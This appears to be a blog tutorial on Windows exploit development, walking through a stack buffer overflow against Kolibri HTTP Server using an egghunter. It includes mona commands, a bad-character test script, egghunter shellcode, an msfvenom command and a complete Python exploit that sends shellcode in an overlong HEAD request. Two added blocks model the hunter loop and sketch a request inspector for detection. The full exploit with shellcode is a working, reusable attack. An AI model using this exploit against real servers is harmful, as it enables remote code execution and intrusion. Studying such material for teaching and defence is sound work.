Windows Exploit Development: Egghunting

Hey Squad,

Hope everyone is doing great!!!

Today, we will be looking at how to exploit Kolibri HTTP Server using the “Egg Hunter” method.

What is Egg Hunter?

In the normal stack-based buffer overflow technique, there was as much space in memory as we wanted for writing the shellcode.

When examining an application that we suspect is vulnerable to a BoF, the memory area we control may not have enough room for the shellcode. In that case the shellcode is sent in a second part of the request, prefixed with a TAG such as ROOT or w00t, so that it is loaded into a different part of memory. A small egghunter placed in the limited space then detects the TAG, and the shellcode behind it is run. This is the EggHunter logic.

An application that you can exploit with a stack-based BoF and an egg hunter can look like the screenshot below in memory.

As seen in the screenshot, only 190 bytes of our shellcode could fit. We do not have enough space.

The Solution: Egg Hunter Method

In such cases, the egghunter method will save lives. The egghunter shellcode we will use performs, in brief, the following process.

The label “w00t” is set by the code itself; the name of this label is the egg. The egghunter searches across the entirety of memory for this tag (the egg is placed twice in a row in front of the shellcode, as “w00tw00t”, so that the hunter does not match the single copy of the tag inside its own code). If it finds it, it jumps there with the “jmp edi” instruction and executes our shellcode, which is what we wanted.
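To make that search loop concrete, here is an added Python 3 model of what the egghunter stub does (this is not the post's code and not the real stub; the memory layout, page contents and the filler payload are constructed here). It shows why the egg is placed twice and how an unmapped page is skipped in one step.

```python
# Added example, not code from the post: a Python 3 model of the egghunter's search
# loop. Memory is modelled as a dict of page base -> page bytes (constructed below);
# a missing page stands for unmapped memory, which the real stub detects through the
# return value of the system call it issues via int 0x2e and then skips whole.
PAGE = 0x1000
EGG = b"w00t"

# Stub bytes exactly as shown on the page (the x86 egghunter). It contains the tag
# once ("\xb8" + "w00t" is "mov eax, 'w00t'"), which is why the hunter looks for the
# tag twice: a single copy would match the hunter's own code.
EGGHUNTER = (b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef"
             b"\xb8w00t\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

def read(memory, addr, n):
    """Read n bytes at addr, or None if any byte lies in an unmapped page."""
    out = bytearray()
    for a in range(addr, addr + n):
        page = memory.get(a & ~(PAGE - 1))
        if page is None:
            return None
        out.append(page[a & (PAGE - 1)])
    return bytes(out)

def egghunt(memory, start=0, end=0x4000):
    """Return the address right after a doubled egg (where the payload starts), or None."""
    addr = start
    while addr < end:
        chunk = read(memory, addr, 8)
        if chunk is None:                       # access violation: move to next page
            addr = (addr | (PAGE - 1)) + 1      # or dx, 0x0fff ; inc edx
            continue
        if chunk == EGG + EGG:                  # two consecutive scasd hits
            return addr + 8                     # jmp edi
        addr += 1
    return None

def build_memory():
    """Constructed layout: stub on page 0, page 1 unmapped, tagged payload on page 2."""
    page0 = (b"A" * 100 + EGGHUNTER).ljust(PAGE, b"\x00")
    fake_payload = b"\x90" * 16                 # filler, not real shellcode
    page2 = (b"B" * 0x200 + EGG + EGG + fake_payload).ljust(PAGE, b"\x00")
    return {0x0000: page0, 0x2000: page2}

if __name__ == "__main__":
    hit = egghunt(build_memory())
    print(hex(hit))                             # prints 0x2208
```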


Exploit Development

File: https://www.exploit-db.com/exploits/34059

Analyze the Exploit Situation

Let’s use the below script to reproduce the crash.

After looking at the crash in Immunity Debugger, the situation is the following:

  • EIP is getting overwritten.
  • We have more than 500 bytes in the initial buffer that can be used to store the main shellcode.

Redirect control to the stack

Find instructions to jump to the stack using mona:

!mona jmp -r esp

Update the EIP value in the exploit with the address of the “jmp esp” instruction found.

Find bad characters

Once we are able to jump to ESP, we should check for bad characters.

# Python 2: string literals are byte strings. "\x00" is left out on purpose,
# as a string terminator it is assumed bad from the start.
badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
# Keep the total at 515 bytes so "BBBB" still lands on EIP.
payload = "A" * (515 - len(badchars)) + badchars + "BBBB" + "C" * 400

Comparing the buffer in memory against what was sent, you will observe that the bad characters are \x00, \x20 and \x3f.

Implement the egghunter

The marker tag we target is “w00t”. Mona can generate such an egghunter shellcode for us.

!mona egg -t w00t
# 32-byte egghunter produced by mona; the tag "w00t" is embedded after "\xb8" (mov eax, 'w00t')
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8w00t\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

Final Exploit

Let’s use msfvenom for the shellcode, excluding the bad characters found above.

msfvenom -p windows/exec cmd=calc.exe -b "\x00\x20\x3f" -f c

Full exploit code:

#!/usr/bin/python
# Python 2: string literals are byte strings, so they can be sent on the socket as-is.
import socket

# Egghunter generated by mona for the tag "w00t" (32 bytes).
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8w00t\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
# msfvenom windows/exec cmd=calc.exe with the bad characters \x00\x20\x3f excluded.
sc = ("\xbf\x9a\xfc\xd9\xc5\xdb\xd3\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
"\x31\x83\xeb\xfc\x31\x7b\x0f\x03\x7b\x95\x1e\x2c\x39\x41\x5c"
"\xcf\xc2\x91\x01\x59\x27\xa0\x01\x3d\x23\x92\xb1\x35\x61\x1e"
"\x39\x1b\x92\x95\x4f\xb4\x95\x1e\xe5\xe2\x98\x9f\x56\xd6\xbb"
"\x23\xa5\x0b\x1c\x1a\x66\x5e\x5d\x5b\x9b\x93\x0f\x34\xd7\x06"
"\xa0\x31\xad\x9a\x4b\x09\x23\x9b\xa8\xd9\x42\x8a\x7e\x52\x1d"
"\x0c\x80\xb7\x15\x05\x9a\xd4\x10\xdf\x11\x2e\xee\xde\xf3\x7f"
"\x0f\x4c\x3a\xb0\xe2\x8c\x7a\x76\x1d\xfb\x72\x85\xa0\xfc\x40"
"\xf4\x7e\x88\x52\x5e\xf4\x2a\xbf\x5f\xd9\xad\x34\x53\x96\xba"
"\x13\x77\x29\x6e\x28\x83\xa2\x91\xff\x02\xf0\xb5\xdb\x4f\xa2"
"\xd4\x7a\x35\x05\xe8\x9d\x96\xfa\x4c\xd5\x3a\xee\xfc\xb4\x50"
"\xf1\x73\xc3\x16\xf1\x8b\xcc\x06\x9a\xba\x47\xc9\xdd\x42\x82"
"\xae\x12\x09\x8f\x86\xba\xd4\x45\x9b\xa6\xe6\xb3\xdf\xde\x64"
"\x36\x9f\x24\x74\x33\x9a\x61\x32\xaf\xd6\xfa\xd7\xcf\x45\xfa"
"\xfd\xb3\x08\x68\x9d\x1d\xaf\x08\x04\x62")

# The egg is written twice in front of the shellcode so the hunter does not match
# the single copy of "w00t" inside its own code.
shellcode = "w00tw00t" + sc
# Layout: [egg + shellcode][padding to 515 bytes][EIP = jmp esp][egghunter][padding]
payload1 = shellcode + "A"*(515-len(shellcode)) + "\xA4\x10\x3D\x77" + egghunter + "C"*100 #jmp esp 773D10A4

buffer = (
"HEAD /" + payload1 + " HTTP/1.1\r\n"
"Host: 127.0.0.1:8080\r\n"
"User-Agent: Exploit Writer\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("127.0.0.1", 8080))
expl.send(buffer)
expl.close()
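From the defensive side, here is an added Python 3 example (not from the post) of a request inspector in the spirit of a WAF or IDS rule for the request shape above: it flags an overlong request target, raw non-printable bytes in the URI, and the egghunter prologue bytes shown on this page. The sample request, the length threshold and the filler payload are constructed here; the request carries no shellcode.

```python
# Added example, not part of the post: a small request inspector for the HEAD
# request shape shown above. The egghunter bytes are the ones printed on the page;
# the sample request is constructed here with filler instead of shellcode.
import re

EGGHUNTER = (b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef"
             b"\xb8w00t\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
MAX_TARGET_LEN = 512   # threshold chosen for this example, not a Kolibri limit
# "or dx,0x0fff ; inc edx ; push edx ; push 2 ; pop eax ; int 0x2e": the prologue
# of the int-0x2e style egghunter used on this page.
EGGHUNTER_PROLOGUE = re.compile(rb"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e")
NON_PRINTABLE = re.compile(rb"[\x00-\x1f\x7f-\xff]")

def inspect_request(raw):
    """Return a list of finding strings for one raw HTTP request given as bytes."""
    findings = []
    request_line = raw.split(b"\r\n", 1)[0]
    try:
        method, rest = request_line.split(b" ", 1)
        target, version = rest.rsplit(b" ", 1)   # tolerate spaces inside the target
    except ValueError:
        return ["malformed request line"]
    if len(target) > MAX_TARGET_LEN:
        findings.append("overlong request target: %d bytes" % len(target))
    if NON_PRINTABLE.search(target):
        findings.append("non-printable bytes in request target")
    if EGGHUNTER_PROLOGUE.search(raw):
        findings.append("egghunter stub signature in request")
    return findings

def build_sample_request():
    """Constructed request shaped like the exploit's: tag + filler, padding, fake EIP, stub."""
    payload = b"w00tw00t" + b"\x90" * 220            # filler in place of shellcode
    payload += b"A" * (515 - len(payload)) + b"XXXX" + EGGHUNTER + b"C" * 100
    return (b"HEAD /" + payload + b" HTTP/1.1\r\n"
            b"Host: 127.0.0.1:8080\r\n"
            b"User-Agent: Exploit Writer\r\n"
            b"Keep-Alive: 115\r\n"
            b"Connection: keep-alive\r\n\r\n")

def build_benign_request():
    """Constructed ordinary HEAD request for comparison."""
    return b"HEAD /index.html HTTP/1.1\r\nHost: 127.0.0.1:8080\r\n\r\n"

if __name__ == "__main__":
    for req in (build_benign_request(), build_sample_request()):
        print(inspect_request(req))
```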

Please give me a clap if you found it to be useful and follow me to get more hacking knowledge.

You can buy me a coffee if you would like to -> https://www.buymeacoffee.com/gowthamaraj
